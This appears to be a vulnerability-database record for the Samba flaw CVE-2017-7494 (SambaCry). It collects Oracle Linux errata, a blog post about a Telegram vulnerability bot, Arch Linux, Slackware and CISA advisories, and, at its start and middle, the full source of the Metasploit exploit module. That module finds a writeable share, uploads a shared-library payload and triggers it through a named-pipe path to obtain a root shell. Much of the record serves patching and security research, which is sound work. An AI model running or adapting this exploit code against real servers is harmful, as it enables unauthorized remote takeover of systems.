@share.to_s.length == 0 \nprint_status(\"Samba version #{samba_version.to_s} found, but no writeable share has been identified\") \nreturn CheckCode::Detected \nend \n \nprint_good(\"Samba version #{samba_version.to_s} found with writeable share '#{@share}'\") \nreturn CheckCode::Appears \nend \n \ndef exploit \n# Setup SMB \nconnect \nsmb_login \n \n# Find a writeable share \nfind_writeable \n \n# Upload the shared library payload \nupload_payload \n \n# Find and execute the payload from the share \nbegin \nfind_payload \nrescue Rex::StreamClosedError, Rex::Proto::SMB::Exceptions::NoReply \nend \n \n# Cleanup the payload \nbegin \nsimple.connect(\"\\\\\\\\#{rhost}\\\\#{@share}\") \nuploaded_path = @path.length == 0 ? \"\\\\#{@payload_name}\" : \"\\\\#{@path}\\\\#{@payload_name}\" \nsimple.delete(uploaded_path) \nrescue Rex::StreamClosedError, Rex::Proto::SMB::Exceptions::NoReply \nend \n \n# Shutdown \ndisconnect \nend \n \nend \n`\n", "cvss": {"score": 0.0, "vector": "NONE"}, "sourceHref": "https://packetstormsecurity.com/files/download/142715/is_known_pipename.rb.txt"}], "oraclelinux": [{"lastseen": "2019-05-29T18:38:46", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "[3.6.23-13.0.2]\n- Fix CVE-2017-7494", "edition": 4, "modified": "2017-05-26T00:00:00", "published": "2017-05-26T00:00:00", "id": "ELSA-2017-1272", "href": "http://linux.oracle.com/errata/ELSA-2017-1272.html", "title": "samba3x security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:36:33", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "[3.6.23-43.0.1]\n- Remove use-after-free talloc_tos() inlined function problem (John Haxby) [orabug 18253258]\n[3.6.24-43]\n- resolves: #1450782 - Fix CVE-2017-7494", "edition": 4, "modified": "2017-05-24T00:00:00", "published": "2017-05-24T00:00:00", "id": "ELSA-2017-1270", "href": "http://linux.oracle.com/errata/ELSA-2017-1270.html", 
"title": "samba security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-05-29T18:34:29", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "[4.2.10-10]\n- resolves: #1450779 - Security fix for CVE-2017-7494", "edition": 4, "modified": "2017-05-24T00:00:00", "published": "2017-05-24T00:00:00", "id": "ELSA-2017-1271", "href": "http://linux.oracle.com/errata/ELSA-2017-1271.html", "title": "samba4 security update", "type": "oraclelinux", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "avleonov": [{"lastseen": "2017-06-10T11:14:54", "bulletinFamily": "blog", "cvelist": ["CVE-2017-7494"], "description": "[Vulners.com](<http://Vulners.com>) team have recently presented a new version of [vulnerability intelligence bot](<https://telegram.me/vulnersBot>) for Telegram messenger. Now you can search for vulnerabilities and other security content by talking with bot.\n\n### Searches\n\nFor example, I've heard about new critical vulnerability in Samba called SambaCry by analogy with [famous WannaCry](<https://avleonov.com/2017/05/13/wannacry-about-vulnerability-management/>). Let's see what Vulners knows about it.\n\n\n\nOk, I see it has id CVE-2017-7494. Do we have exploits related to this vulnerability? \n_ cvelist:CVE-2017-7494 AND bulletinFamily:\"exploit\"_\n\n\n\nEven in Metasploit! Seems to be critical. Do we already have patches for CentOS 6 and 7? \n_cvelist:CVE-2017-7494 AND type:centos_\n\n\n\nYep, we can now make a task to IT department to update it.\n\n**NB:** Did you know that critical patches for CentOS 5 were available till the March 31 2017? CentOS 5 is officially dead and if you still use it you should migrate to supported distribution ASAP.\n\nCan we already detect this vulnerability using vulnerability scanners? \n_cvelist:CVE-2017-7494 AND bulletinFamily:\"scanner\" AND title:CentOS_\n\n\n\nTwo authenticated checks for Nessus. Not bad. 
If you have configured regular vulnerability scans of your infrastructure, you can get the list of vulnerable hosts from the existing scan results. Or you can perform a new scan task with only these two plugins active in the scan policy.\n\n### Subscriptions\n\nHowever, this vulnerability is interesting and I would like to get new information about it as soon as it is available in Vulners. I want to subscribe to _cvelist:CVE-2017-7494 OR SambaCry_. Checking the request:\n\n\n\nAnd making a new subscription. Available commands:\n\n\n\nI choose _/subscription_\n\n\n\n\"Add new subscription\":\n\n\n\n\"Custom query\":\n\n\n\nSubscription delivery format. I choose \"Text\":\n\n\n\nHow often I would like to receive messages. \"As soon as possible\":\n\n\n\nApprove the subscription:\n\n\n\n\n\nWhen Vulners gets a new object matched by this query, vulnersBot will send me a notification like this one:\n\n\n\nAnd if I would like to delete this subscription, I will write /subscription and choose \"Edit current subscription\". The bot will show me my current subscriptions:\n\n\n\nEach of them I can Activate, Deactivate or Delete:\n\n\n\nAs you can see, I also have a subscription \"Blogs review\". It's one of the standard templates that you can choose in vulnersBot. It is the same as _bulletinFamily:blog_\n\nVulners aggregates posts from 13 \"blog\" sources right now. This list includes top Vulnerability Management vendors Qualys and Rapid7, and WAF vendors Akamai, Imperva, Wallarm, well-known media and independent security bloggers. So if a really critical vulnerability appears, I will easily get up-to-date information from them.\n\n\n\nThese templates are currently available in the \"subscription marketplace\":\n\n * Security news\n * Exploit updates\n * Blogs review\n * Bugbounty\n * Linux vulnerabilities\n * Scanners plugins updates\n * CVE\n\nThanks for your attention! 
If you find a bug in vulnersBot please write an email to isox@vulners.com or telegram user @isox_xx\n\n", "modified": "2017-05-28T10:59:52", "published": "2017-05-28T10:59:52", "href": "http://feedproxy.google.com/~r/avleonov/~3/g4smUW8Mxok/", "id": "AVLEONOV:40C2BE2DE75816DD7ED47DA106AF9627", "title": "New vulnersBot for Telegram with advanced searches and subscriptions", "type": "avleonov", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "metasploit": [{"lastseen": "2020-10-07T20:08:57", "description": "This module triggers an arbitrary shared library load vulnerability in Samba versions 3.5.0 and later, prior to the fixed releases 4.4.14, 4.5.10, and 4.6.4. This module requires valid credentials, a writeable folder in an accessible share, and knowledge of the server-side path of the writeable folder. In some cases, anonymous access combined with common filesystem locations can be used to automatically exploit this vulnerability.\n", "published": "2017-05-25T00:42:04", "type": "metasploit", "title": "Samba is_known_pipename() Arbitrary Module Load", "bulletinFamily": "exploit", "cvelist": ["CVE-2017-7494"], "modified": "2020-10-02T20:00:37", "id": "MSF:EXPLOIT/LINUX/SAMBA/IS_KNOWN_PIPENAME", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = ExcellentRanking\n\n include Msf::Exploit::Remote::DCERPC\n include Msf::Exploit::Remote::SMB::Client\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Samba is_known_pipename() Arbitrary Module Load',\n 'Description' => %q{\n This module triggers an arbitrary shared library load vulnerability\n in Samba versions 3.5.0 to 4.4.14, 4.5.10, and 4.6.4. This module\n requires valid credentials, a writeable folder in an accessible share,\n and knowledge of the server-side path of the writeable folder. 
In\n some cases, anonymous access combined with common filesystem locations\n can be used to automatically exploit this vulnerability.\n },\n 'Author' =>\n [\n 'steelo <knownsteelo[at]gmail.com>', # Vulnerability Discovery & Python Exploit\n 'hdm', # Metasploit Module\n 'bcoles', # Check logic\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2017-7494' ],\n [ 'URL', 'https://www.samba.org/samba/security/CVE-2017-7494.html' ],\n ],\n 'Payload' =>\n {\n 'Space' => 9000,\n 'DisableNops' => true\n },\n 'Platform' => 'linux',\n 'Targets' =>\n [\n\n [ 'Automatic (Interact)',\n { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ], 'Interact' => true,\n 'Payload' => {\n 'Compat' => {\n 'PayloadType' => 'cmd_interact', 'ConnectionType' => 'find'\n }\n }\n }\n ],\n [ 'Automatic (Command)',\n { 'Arch' => ARCH_CMD, 'Platform' => [ 'unix' ] }\n ],\n [ 'Linux x86', { 'Arch' => ARCH_X86 } ],\n [ 'Linux x86_64', { 'Arch' => ARCH_X64 } ],\n [ 'Linux ARM (LE)', { 'Arch' => ARCH_ARMLE } ],\n [ 'Linux ARM64', { 'Arch' => ARCH_AARCH64 } ],\n [ 'Linux MIPS', { 'Arch' => ARCH_MIPS } ],\n [ 'Linux MIPSLE', { 'Arch' => ARCH_MIPSLE } ],\n [ 'Linux MIPS64', { 'Arch' => ARCH_MIPS64 } ],\n [ 'Linux MIPS64LE', { 'Arch' => ARCH_MIPS64LE } ],\n [ 'Linux PPC', { 'Arch' => ARCH_PPC } ],\n [ 'Linux PPC64', { 'Arch' => ARCH_PPC64 } ],\n [ 'Linux PPC64 (LE)', { 'Arch' => ARCH_PPC64LE } ],\n [ 'Linux SPARC', { 'Arch' => ARCH_SPARC } ],\n [ 'Linux SPARC64', { 'Arch' => ARCH_SPARC64 } ],\n [ 'Linux s390x', { 'Arch' => ARCH_ZARCH } ],\n ],\n 'DefaultOptions' =>\n {\n 'DCERPC::fake_bind_multi' => false,\n 'SHELL' => '/bin/sh',\n },\n 'Privileged' => true,\n 'DisclosureDate' => '2017-03-24',\n 'DefaultTarget' => 0))\n\n register_options(\n [\n OptString.new('SMB_SHARE_NAME', [false, 'The name of the SMB share containing a writeable directory']),\n OptString.new('SMB_FOLDER', [false, 'The directory to use within the writeable SMB share']),\n ])\n\n end\n\n def post_auth?\n true\n end\n\n # Setup 
our mapping of Metasploit architectures to gcc architectures\n def setup\n super\n @@payload_arch_mappings = {\n ARCH_X86 => [ 'x86' ],\n ARCH_X64 => [ 'x86_64' ],\n ARCH_MIPS => [ 'mips' ],\n ARCH_MIPSLE => [ 'mipsel' ],\n ARCH_MIPSBE => [ 'mips' ],\n ARCH_MIPS64 => [ 'mips64' ],\n ARCH_MIPS64LE => [ 'mips64el' ],\n ARCH_PPC => [ 'powerpc' ],\n ARCH_PPC64 => [ 'powerpc64' ],\n ARCH_PPC64LE => [ 'powerpc64le' ],\n ARCH_SPARC => [ 'sparc' ],\n ARCH_SPARC64 => [ 'sparc64' ],\n ARCH_ARMLE => [ 'armel', 'armhf' ],\n ARCH_AARCH64 => [ 'aarch64' ],\n ARCH_ZARCH => [ 's390x' ],\n }\n\n # Architectures we don't offically support but can shell anyways with interact\n @@payload_arch_bonus = %W{\n mips64el sparc64 s390x\n }\n\n # General platforms (OS + C library)\n @@payload_platforms = %W{\n linux-glibc\n }\n end\n\n # List all top-level directories within a given share\n def enumerate_directories(share)\n begin\n vprint_status('Use Rex client (SMB1 only) to enumerate directories, since it is not compatible with RubySMB client')\n connect(versions: [1])\n smb_login\n self.simple.connect(\"\\\\\\\\#{rhost}\\\\#{share}\")\n stuff = self.simple.client.find_first(\"\\\\*\")\n directories = [\"\"]\n stuff.each_pair do |entry,entry_attr|\n next if %W{. ..}.include?(entry)\n next unless entry_attr['type'] == 'D'\n directories << entry\n end\n\n return directories\n\n rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e\n vprint_error(\"Enum #{share}: #{e}\")\n return nil\n\n ensure\n simple.disconnect(\"\\\\\\\\#{rhost}\\\\#{share}\")\n smb_connect\n end\n end\n\n # Determine whether a directory in a share is writeable\n def verify_writeable_directory(share, directory=\"\")\n begin\n simple.connect(\"\\\\\\\\#{rhost}\\\\#{share}\")\n\n random_filename = Rex::Text.rand_text_alpha(5)+\".txt\"\n filename = directory.length == 0 ? 
\"\\\\#{random_filename}\" : \"\\\\#{directory}\\\\#{random_filename}\"\n\n wfd = simple.open(filename, 'rwct')\n wfd << Rex::Text.rand_text_alpha(8)\n wfd.close\n\n simple.delete(filename)\n return true\n\n rescue ::Rex::Proto::SMB::Exceptions::ErrorCode, RubySMB::Error::RubySMBError => e\n vprint_error(\"Write #{share}#{filename}: #{e}\")\n return false\n\n ensure\n simple.disconnect(\"\\\\\\\\#{rhost}\\\\#{share}\")\n end\n end\n\n # Call NetShareGetInfo to retrieve the server-side path\n def find_share_path\n share_info = smb_netsharegetinfo(@share)\n share_info[:path].gsub(\"\\\\\", \"/\").sub(/^.*:/, '')\n end\n\n # Crawl top-level directories and test for writeable\n def find_writeable_path(share)\n subdirs = enumerate_directories(share)\n return unless subdirs\n\n if datastore['SMB_FOLDER'].to_s.length > 0\n subdirs.unshift(datastore['SMB_FOLDER'])\n end\n\n subdirs.each do |subdir|\n next unless verify_writeable_directory(share, subdir)\n return subdir\n end\n\n nil\n end\n\n # Locate a writeable directory across identified shares\n def find_writeable_share_path\n @path = nil\n share_info = smb_netshareenumall\n if datastore['SMB_SHARE_NAME'].to_s.length > 0\n share_info.unshift [datastore['SMB_SHARE_NAME'], 'DISK', '']\n end\n\n share_info.each do |share|\n next if share.first.upcase == 'IPC$'\n found = find_writeable_path(share.first)\n next unless found\n @share = share.first\n @path = found\n break\n end\n end\n\n # Locate a writeable share\n def find_writeable\n find_writeable_share_path\n unless @share && @path\n print_error(\"No suitable share and path were found, try setting SMB_SHARE_NAME and SMB_FOLDER\")\n fail_with(Failure::NoTarget, \"No matching target\")\n end\n print_status(\"Using location \\\\\\\\#{rhost}\\\\#{@share}\\\\#{@path} for the path\")\n end\n\n # Store the wrapped payload into the writeable share\n def upload_payload(wrapped_payload)\n begin\n self.simple.connect(\"\\\\\\\\#{rhost}\\\\#{@share}\")\n\n random_filename = 
Rex::Text.rand_text_alpha(8)+\".so\"\n filename = @path.length == 0 ? \"\\\\#{random_filename}\" : \"\\\\#{@path}\\\\#{random_filename}\"\n\n wfd = simple.open(filename, 'rwct')\n wfd << wrapped_payload\n wfd.close\n\n @payload_name = random_filename\n\n rescue ::Rex::Proto::SMB::Exceptions::ErrorCode => e\n print_error(\"Write #{@share}#{filename}: #{e}\")\n return false\n\n ensure\n simple.disconnect(\"\\\\\\\\#{rhost}\\\\#{@share}\")\n end\n\n print_status(\"Uploaded payload to \\\\\\\\#{rhost}\\\\#{@share}#{filename}\")\n return true\n end\n\n # Try both pipe open formats in order to load the uploaded shared library\n def trigger_payload\n\n target = [@share_path, @path, @payload_name].join(\"/\").gsub(/\\/+/, '/')\n [\n \"\\\\\\\\PIPE\\\\\" + target,\n target\n ].each do |tpath|\n\n print_status(\"Loading the payload from server-side path #{target} using #{tpath}...\")\n\n smb_connect\n\n # Try to execute the shared library from the share\n begin\n simple.client.create_pipe(tpath)\n probe_module_path(tpath)\n\n rescue Rex::StreamClosedError, Rex::Proto::SMB::Exceptions::NoReply, ::Timeout::Error, ::EOFError\n # Common errors we can safely ignore\n\n rescue Rex::Proto::SMB::Exceptions::ErrorCode => e\n # Look for STATUS_OBJECT_PATH_INVALID indicating our interact payload loaded\n if e.error_code == 0xc0000039\n pwn\n return true\n else\n print_error(\" >> Failed to load #{e.error_name}\")\n end\n rescue RubySMB::Error::UnexpectedStatusCode, RubySMB::Error::InvalidPacket => e\n if e.status_code == ::WindowsError::NTStatus::STATUS_OBJECT_PATH_INVALID\n pwn\n return true\n else\n print_error(\" >> Failed to load #{e.status_code.name}\")\n end\n end\n\n disconnect\n\n end\n\n false\n end\n\n def pwn\n print_good(\"Probe response indicates the interactive payload was loaded...\")\n smb_shell = self.sock\n self.sock = nil\n remove_socket(sock)\n handler(smb_shell)\n end\n\n # Use fancy payload wrappers to make exploitation a joyously lazy exercise\n def 
cycle_possible_payloads\n template_base = ::File.join(Msf::Config.data_directory, \"exploits\", \"CVE-2017-7494\")\n template_list = []\n template_type = nil\n template_arch = nil\n\n # Handle the generic command types first\n if target.arch.include?(ARCH_CMD)\n template_type = target['Interact'] ? 'findsock' : 'system'\n\n all_architectures = @@payload_arch_mappings.values.flatten.uniq\n\n # Include our bonus architectures for the interact payload\n if target['Interact']\n @@payload_arch_bonus.each do |t_arch|\n all_architectures << t_arch\n end\n end\n\n # Prioritize the most common architectures first\n %W{ x86_64 x86 armel armhf mips mipsel }.each do |t_arch|\n template_list << all_architectures.delete(t_arch)\n end\n\n # Queue up the rest for later\n all_architectures.each do |t_arch|\n template_list << t_arch\n end\n\n # Handle the specific architecture targets next\n else\n template_type = 'shellcode'\n target.arch.each do |t_name|\n @@payload_arch_mappings[t_name].each do |t_arch|\n template_list << t_arch\n end\n end\n end\n\n # Remove any duplicates that mau have snuck in\n template_list.uniq!\n\n # Cycle through each top-level platform we know about\n @@payload_platforms.each do |t_plat|\n\n # Cycle through each template and yield\n template_list.each do |t_arch|\n\n\n wrapper_path = ::File.join(template_base, \"samba-root-#{template_type}-#{t_plat}-#{t_arch}.so.gz\")\n next unless ::File.exists?(wrapper_path)\n\n data = ''\n ::File.open(wrapper_path, \"rb\") do |fd|\n data = Rex::Text.ungzip(fd.read)\n end\n\n pidx = data.index('PAYLOAD')\n if pidx\n data[pidx, payload.encoded.length] = payload.encoded\n end\n\n vprint_status(\"Using payload wrapper 'samba-root-#{template_type}-#{t_arch}'...\")\n yield(data)\n end\n end\n end\n\n # Verify that the payload settings make sense\n def sanity_check\n if target['Interact'] && datastore['PAYLOAD'] != \"cmd/unix/interact\"\n print_error(\"Error: The interactive target is chosen (0) but PAYLOAD is not set to 
cmd/unix/interact\")\n print_error(\" Please set PAYLOAD to cmd/unix/interact and try this again\")\n print_error(\"\")\n fail_with(Failure::NoTarget, \"Invalid payload chosen for the interactive target\")\n end\n\n if ! target['Interact'] && datastore['PAYLOAD'] == \"cmd/unix/interact\"\n print_error(\"Error: A non-interactive target is chosen but PAYLOAD is set to cmd/unix/interact\")\n print_error(\" Please set a valid PAYLOAD and try this again\")\n print_error(\"\")\n fail_with(Failure::NoTarget, \"Invalid payload chosen for the non-interactive target\")\n end\n end\n\n # Shorthand for connect and login\n def smb_connect\n connect\n smb_login\n end\n\n # Start the shell train\n def exploit\n # Validate settings\n sanity_check\n\n # Setup SMB\n smb_connect\n\n # Find a writeable share\n find_writeable\n\n # Retrieve the server-side path of the share like a boss\n print_status(\"Retrieving the remote path of the share '#{@share}'\")\n @share_path = find_share_path\n print_status(\"Share '#{@share}' has server-side path '#{@share_path}\")\n\n # Disconnect\n disconnect\n\n # Create wrappers for each potential architecture\n cycle_possible_payloads do |wrapped_payload|\n\n # Connect, upload the shared library payload, disconnect\n smb_connect\n upload_payload(wrapped_payload)\n disconnect\n\n # Trigger the payload\n early = trigger_payload\n\n # Cleanup the payload\n begin\n smb_connect\n simple.connect(\"\\\\\\\\#{rhost}\\\\#{@share}\")\n uploaded_path = @path.length == 0 ? 
\"\\\\#{@payload_name}\" : \"\\\\#{@path}\\\\#{@payload_name}\"\n simple.delete(uploaded_path)\n disconnect\n rescue Rex::StreamClosedError, Rex::Proto::SMB::Exceptions::NoReply, ::Timeout::Error, ::EOFError\n end\n\n # Bail early if our interact payload loaded\n return if early\n end\n end\n\n # A version-based vulnerability check for Samba\n def check\n res = smb_fingerprint\n\n unless res['native_lm'] =~ /Samba ([\\d\\.]+)/\n print_error(\"does not appear to be Samba: #{res['os']} / #{res['native_lm']}\")\n return CheckCode::Safe\n end\n\n samba_version = Gem::Version.new($1.gsub(/\\.$/, ''))\n\n vprint_status(\"Samba version identified as #{samba_version.to_s}\")\n\n if samba_version < Gem::Version.new('3.5.0')\n return CheckCode::Safe\n end\n\n # Patched in 4.4.14\n if samba_version < Gem::Version.new('4.5.0') &&\n samba_version >= Gem::Version.new('4.4.14')\n return CheckCode::Safe\n end\n\n # Patched in 4.5.10\n if samba_version > Gem::Version.new('4.5.0') &&\n samba_version < Gem::Version.new('4.6.0') &&\n samba_version >= Gem::Version.new('4.5.10')\n return CheckCode::Safe\n end\n\n # Patched in 4.6.4\n if samba_version >= Gem::Version.new('4.6.4')\n return CheckCode::Safe\n end\n\n smb_connect\n find_writeable_share_path\n disconnect\n\n if @share.to_s.length == 0\n print_status(\"Samba version #{samba_version.to_s} found, but no writeable share has been identified\")\n return CheckCode::Detected\n end\n\n print_good(\"Samba version #{samba_version.to_s} found with writeable share '#{@share}'\")\n return CheckCode::Appears\n end\nend\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/exploits/linux/samba/is_known_pipename.rb"}], "archlinux": [{"lastseen": "2020-09-22T18:36:43", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "Arch Linux Security Advisory ASA-201705-22\n==========================================\n\nSeverity: 
High\nDate : 2017-05-30\nCVE-ID : CVE-2017-7494\nPackage : samba\nType : arbitrary code execution\nRemote : Yes\nLink : https://security.archlinux.org/AVG-279\n\nSummary\n=======\n\nThe package samba before version 4.5.10-1 is vulnerable to arbitrary\ncode execution.\n\nResolution\n==========\n\nUpgrade to 4.5.10-1.\n\n# pacman -Syu \"samba>=4.5.10-1\"\n\nThe problem has been fixed upstream in version 4.5.10.\n\nWorkaround\n==========\n\nAdd the parameter:\n\nnt pipe support = no\n\nto the [global] section of your smb.conf and restart smbd. This\nprevents clients from accessing any named pipe endpoints. Note that\nthis can disable some expected functionality for Windows clients.\n\nDescription\n===========\n\nAll versions of Samba from 3.5.0 onwards are vulnerable to a remote\ncode execution vulnerability, allowing a malicious client to upload a\nshared library to a writable share, and then cause the server to load\nand execute it.\n\nImpact\n======\n\nA malicious authenticated client can execute arbitrary code on the\naffected host by uploading a shared library to a writable share.\n\nReferences\n==========\n\nhttps://www.samba.org/samba/security/CVE-2017-7494.html\nhttps://security.archlinux.org/CVE-2017-7494", "modified": "2017-05-30T00:00:00", "published": "2017-05-30T00:00:00", "id": "ASA-201705-22", "href": "https://security.archlinux.org/ASA-201705-22", "type": "archlinux", "title": "[ASA-201705-22] samba: arbitrary code execution", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "slackware": [{"lastseen": "2020-10-25T16:36:29", "bulletinFamily": "unix", "cvelist": ["CVE-2017-7494"], "description": "New samba packages are available for Slackware 13.1, 13.37, 14.0, 14.1, 14.2,\nand -current to fix a security issue.\n\n\nHere are the details from the Slackware 14.2 ChangeLog:\n\npatches/packages/samba-4.4.14-i586-1_slack14.2.txz: Upgraded.\n This update fixes a remote code execution vulnerability, allowing a\n malicious client to upload a 
shared library to a writable share, and\n then cause the server to load and execute it.\n For more information, see:\n https://www.samba.org/samba/security/CVE-2017-7494.html\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-7494\n (* Security fix *)\n\nWhere to find the new packages:\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the \"Get Slack\" section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated package for Slackware 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware-13.1/patches/packages/samba-3.5.22-i486-2_slack13.1.txz\n\nUpdated package for Slackware x86_64 13.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.1/patches/packages/samba-3.5.22-x86_64-2_slack13.1.txz\n\nUpdated package for Slackware 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware-13.37/patches/packages/samba-3.5.22-i486-2_slack13.37.txz\n\nUpdated package for Slackware x86_64 13.37:\nftp://ftp.slackware.com/pub/slackware/slackware64-13.37/patches/packages/samba-3.5.22-x86_64-2_slack13.37.txz\n\nUpdated package for Slackware 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware-14.0/patches/packages/samba-4.4.14-i486-1_slack14.0.txz\n\nUpdated package for Slackware x86_64 14.0:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.0/patches/packages/samba-4.4.14-x86_64-1_slack14.0.txz\n\nUpdated package for Slackware 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware-14.1/patches/packages/samba-4.4.14-i486-1_slack14.1.txz\n\nUpdated package for Slackware x86_64 14.1:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.1/patches/packages/samba-4.4.14-x86_64-1_slack14.1.txz\n\nUpdated package for Slackware 14.2:\nftp://ftp.slackware.com/pub/slackware/slackware-14.2/patches/packages/samba-4.4.14-i586-1_slack14.2.txz\n\nUpdated package for Slackware x86_64 
14.2:\nftp://ftp.slackware.com/pub/slackware/slackware64-14.2/patches/packages/samba-4.4.14-x86_64-1_slack14.2.txz\n\nUpdated package for Slackware -current:\nftp://ftp.slackware.com/pub/slackware/slackware-current/slackware/n/samba-4.6.4-i586-1.txz\n\nUpdated package for Slackware x86_64 -current:\nftp://ftp.slackware.com/pub/slackware/slackware64-current/slackware64/n/samba-4.6.4-x86_64-1.txz\n\n\nMD5 signatures:\n\nSlackware 13.1 package:\nfbf0d50ebce5e496934ec71e2a469630 samba-3.5.22-i486-2_slack13.1.txz\n\nSlackware x86_64 13.1 package:\n26b98c39663aa6bc19341405a462cd5f samba-3.5.22-x86_64-2_slack13.1.txz\n\nSlackware 13.37 package:\n4fd566e8db519817cef6c0dd00b3f3c8 samba-3.5.22-i486-2_slack13.37.txz\n\nSlackware x86_64 13.37 package:\n51f6b1c81394f55fc81bb1ae77814deb samba-3.5.22-x86_64-2_slack13.37.txz\n\nSlackware 14.0 package:\n527dfcc8594234c66c6993abb4eaa51c samba-4.4.14-i486-1_slack14.0.txz\n\nSlackware x86_64 14.0 package:\n208596f558cb9779c9dbcaf952f87f84 samba-4.4.14-x86_64-1_slack14.0.txz\n\nSlackware 14.1 package:\n65f28566c666b4b5f3e33d67372525ef samba-4.4.14-i486-1_slack14.1.txz\n\nSlackware x86_64 14.1 package:\nddfa90d4c72cb065b52a150aa898043d samba-4.4.14-x86_64-1_slack14.1.txz\n\nSlackware 14.2 package:\nb533e541453620b47b2ce769aa73e0e2 samba-4.4.14-i586-1_slack14.2.txz\n\nSlackware x86_64 14.2 package:\na61aef22c3ea498bdbb8caba0ec8ff85 samba-4.4.14-x86_64-1_slack14.2.txz\n\nSlackware -current package:\n8e4bce86a15b0b6bb85b0b6894d8c587 n/samba-4.6.4-i586-1.txz\n\nSlackware x86_64 -current package:\n691f1e10acad26dbb0ddd268ed5415d0 n/samba-4.6.4-x86_64-1.txz\n\n\nInstallation instructions:\n\nUpgrade the package as root:\n > upgradepkg samba-4.4.14-i586-1_slack14.2.txz\n\nThen, if Samba is running restart it:\n\n > /etc/rc.d/rc.samba restart", "modified": "2017-05-24T20:34:46", "published": "2017-05-24T20:34:46", "id": "SSA-2017-144-01", "href": 
"http://www.slackware.com/security/viewer.php?l=slackware-security&y=2017&m=slackware-security.513769", "type": "slackware", "title": "[slackware-security] samba", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa": [{"lastseen": "2021-02-24T18:07:39", "bulletinFamily": "info", "cvelist": ["CVE-2017-7494"], "description": "The Samba Team has released security updates that address a vulnerability in all versions of Samba from 3.5.0 onward. A remote attacker could exploit this vulnerability to take control of an affected system.\n\nUS-CERT encourages users and administrators to review Samba's [Security Announcement](<https://www.samba.org/samba/security/CVE-2017-7494.html>) and apply the necessary updates, or refer to their Linux or Unix-based OS vendors for appropriate patches.\n\nThis product is provided subject to this Notification and this [Privacy & Use](<https://www.dhs.gov/privacy-policy>) policy.\n\n**Please share your thoughts.**\n\nWe recently updated our anonymous [product survey](<https://www.surveymonkey.com/r/CISA-cyber-survey?product=https://us-cert.cisa.gov/ncas/current-activity/2017/05/24/Samba-Releases-Security-Updates>); we'd welcome your feedback.\n", "modified": "2017-05-24T00:00:00", "published": "2017-05-24T00:00:00", "id": "CISA:384A71FB1AD858FAC86EEB1A7660E778", "href": "https://us-cert.cisa.gov/ncas/current-activity/2017/05/24/Samba-Releases-Security-Updates", "type": "cisa", "title": "Samba Releases Security Updates", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}]}